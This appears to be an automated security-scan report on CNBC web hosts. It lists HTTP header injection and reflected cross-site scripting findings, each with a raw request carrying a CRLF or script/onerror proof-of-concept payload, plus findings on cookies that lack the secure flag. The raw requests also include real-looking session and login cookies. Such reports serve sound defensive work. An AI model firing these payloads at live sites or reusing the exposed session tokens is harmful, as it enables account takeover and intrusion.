HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
1.1. https://register.cnbc.com/refreshlogin.jsp [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/refreshlogin.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 4fd1d%0d%0a2fb3a4f0f2f was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /refreshlogin.jsp?source=header&service=http://www.cnbc.com/id/15837362&4fd1d%0d%0a2fb3a4f0f2f=1 HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the service request parameter is copied into the Location response header. The payload a518e%0d%0af7b3476e81c was submitted in the service parameter. This caused a response containing an injected HTTP header.
The value of the source request parameter is copied into the Location response header. The payload 7974e%0d%0adde7e0be2f3 was submitted in the source parameter. This caused a response containing an injected HTTP header.
Request
GET /refreshlogin.jsp?source=7974e%0d%0adde7e0be2f3&service=http://www.cnbc.com/id/15837362 HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
1.4. https://register.cnbc.com/registerUser.do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/registerUser.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 5d300%0d%0a807bac58b99 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /registerUser.do?5d300%0d%0a807bac58b99=1 HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
2.1. http://api-cdn.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://api-cdn.cnbc.com
Path:
/api/chart/chart.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 232b7<script>alert(1)</script>927105fa1dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/chart/chart.asp?232b7<script>alert(1)</script>927105fa1dc=1 HTTP/1.1 Host: api-cdn.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO3=unkz; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; s_cc=true; s_nr=1292257245769; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-1082571395-1289590021769; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
Response
HTTP/1.1 200 OK IISExport: This web site was exported using IIS Export v4.2 IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Content-Length: 182 Content-Type: text/html Expires: Tue, 21 Dec 2010 18:38:13 GMT Cache-Control: private Vary: Accept-Encoding Date: Tue, 21 Dec 2010 19:18:13 GMT Connection: close
2.2. http://api.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://api.cnbc.com
Path:
/api/chart/chart.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d26ef<script>alert(1)</script>8431c81f5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/chart/chart.asp?d26ef<script>alert(1)</script>8431c81f5f=1 HTTP/1.1 Host: api.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO3=unkz; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CMain%252520Menu%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/email/EmailSupport.jsp%2526ot%253DA; Axxd=1; AxData=; s_cc=true; s_nr=1292954620754; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
Response
HTTP/1.1 200 OK Date: Tue, 21 Dec 2010 19:18:04 GMT X-Powered-By: ASP.NET Connection: close P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Content-Length: 180 Content-Type: text/html Expires: Tue, 21 Dec 2010 18:38:05 GMT Cache-control: private
The value of the chartType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d9dd"><script>alert(1)</script>ebb3af0ee4f was submitted in the chartType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/movers/movers.asp?chartType=gainers7d9dd"><script>alert(1)</script>ebb3af0ee4f&rowCount=5&link=quote HTTP/1.1 Host: api.cnbc.com Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1082571395-1289590021769; s_nr=1292257245769
Response
HTTP/1.1 200 OK Date: Tue, 21 Dec 2010 17:58:06 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Content-Length: 2476 Content-Type: text/html Expires: Tue, 21 Dec 2010 17:18:06 GMT Cache-control: private
The value of the rowCount request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc07e"><script>alert(1)</script>9e8073fe53e was submitted in the rowCount parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/movers/movers.asp?chartType=gainers&rowCount=5cc07e"><script>alert(1)</script>9e8073fe53e&link=quote HTTP/1.1 Host: api.cnbc.com Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1082571395-1289590021769; s_nr=1292257245769
Response
HTTP/1.1 200 OK Date: Tue, 21 Dec 2010 17:58:14 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Content-Length: 2476 Content-Type: text/html Expires: Tue, 21 Dec 2010 17:18:14 GMT Cache-control: private
The value of the symbol request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbae0"><script>alert(1)</script>9fd9dc9802 was submitted in the symbol parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Tue, 21 Dec 2010 18:13:24 GMT X-Powered-By: ASP.NET P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Content-Length: 1345 Content-Type: text/html Expires: Tue, 21 Dec 2010 17:33:24 GMT Set-Cookie: 1602%5F0=920CF2042D8463B866A435CD94005864; path=/ Set-Cookie: 1602%5F1=YYY5%5F5mpgv39vi%2FERpV2HIS%2BUNQ%3D%3D; expires=Thu, 29-Aug-2024 17:13:24 GMT; path=/ Cache-control: private
The value of the login_view request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0776"><script>alert(1)</script>90e36e3f064 was submitted in the login_view parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=headerd0776"><script>alert(1)</script>90e36e3f064 HTTP/1.1 Host: login.cnbc.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
2.7. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/cas/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c0f6"><script>alert(1)</script>6446371245e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=header&5c0f6"><script>alert(1)</script>6446371245e=1 HTTP/1.1 Host: login.cnbc.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the service request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29e74"><script>alert(1)</script>d9a4ca8d771 was submitted in the service parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check29e74"><script>alert(1)</script>d9a4ca8d771&source=header&login_view=header HTTP/1.1 Host: login.cnbc.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ddee"><script>alert(1)</script>33ae790afc7 was submitted in the source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header6ddee"><script>alert(1)</script>33ae790afc7&login_view=header HTTP/1.1 Host: login.cnbc.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the &symbols request parameter is copied into the HTML document as plain text between tags. The payload 34a5c<img%20src%3da%20onerror%3dalert(1)>a5537f4915f was submitted in the &symbols parameter. This input was echoed as 34a5c<img src=a onerror=alert(1)>a5537f4915f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /quote-html-webservice/quote.htm?&symbols=.GDAXI|34a5c<img%20src%3da%20onerror%3dalert(1)>a5537f4915f&requestMethod=quick&noform=1&realtime=1&client=flexQuote&output=json&random=1292953145398 HTTP/1.1 Host: quote.cnbc.com Proxy-Connection: keep-alive Referer: http://quote.cnbc.com/quoteproxy.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1082571395-1289590021769; s_nr=1292257245769; s_cc=true; s_sq=%5B%5BB%5D%5D
{"QuickQuoteResult":{"QuickQuote":[{"comments":{},"cacheServed":"true","volume":"66695104","altSymbol":".GDAXI","last_time":"2010-12-21T17:45:00","exchange":"Frankfurt","code":"0","open":"7045.2 ...[SNIP]... :"7042.98","change_pct":"0.85","symbol":".GDAXI","last":"7077.99","previous_day_closing":"7018.6","mappedSymbol":".GDAXI","provider":"Wall Street on Demand","source":"Frankfurt"},{"code":"1","symbol":"34A5C<IMG SRC=A ONERROR=ALERT(1)>A5537F4915F"}],"xmlns":"http://quote.cnbc.com/services/MultiQuote/2006"}}
The value of the keywords request parameter is copied into the HTML document as text between TITLE tags. The payload 1f313</title><script>alert(1)</script>a8fceb4a0a2d783b6 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5647e</script><script>alert(1)</script>b85c1c04f6aef5c6f was submitted in the keywords parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cas/checkCasTicket HTTP/1.1 Host: login.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=0BDCD955EB995F8A6B2D0E3E54C2EB94; CASTGC=TGT-521-9pmj3bXHxQh5Pt4a5pj24jFdXegFOzEgUgE-50; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; CASPRIVACY=; Axxd=1; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CMain%252520Menu%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/email/EmailSupport.jsp%2526ot%253DA; AxData=; s_cc=true; s_nr=1292954620754; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
Response
HTTP/1.1 200 OK Date: Tue, 21 Dec 2010 19:24:36 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Set-Cookie: JSESSIONID=6BF4480DEF5C01845E5BBF6731B7329D; Path=/cas Content-Language: en Content-Length: 118 Connection: close Content-Type: text/xml;charset=ISO-8859-1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=header HTTP/1.1 Host: login.cnbc.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cas/logout HTTP/1.1 Host: login.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=5F034B0145D5B97FF8042C2DB05CA38E; CASTGC=TGT-521-9pmj3bXHxQh5Pt4a5pj24jFdXegFOzEgUgE-50; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; CASPRIVACY=; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; s_cc=true; TZM=-360; s_nr=1292954620754; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /email/contactCustomerService.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /refreshlogin.jsp?source=header&service=http://www.cnbc.com/id/15837362 HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /registerUser.do HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1082571395-1289590021769; TZM=-360; s_nr=1292257245769; s_cc=true; s_sq=%5B%5BB%5D%5D
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; SUBSCRIBERINFO3=unkz; JSESSIONID=698F629D8D09311DADAE187E0DFFC18F; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1640092224.20480.0000; s_cc=true; TZM=-360; s_nr=1292954620754; pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1640092224.23040.0000; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
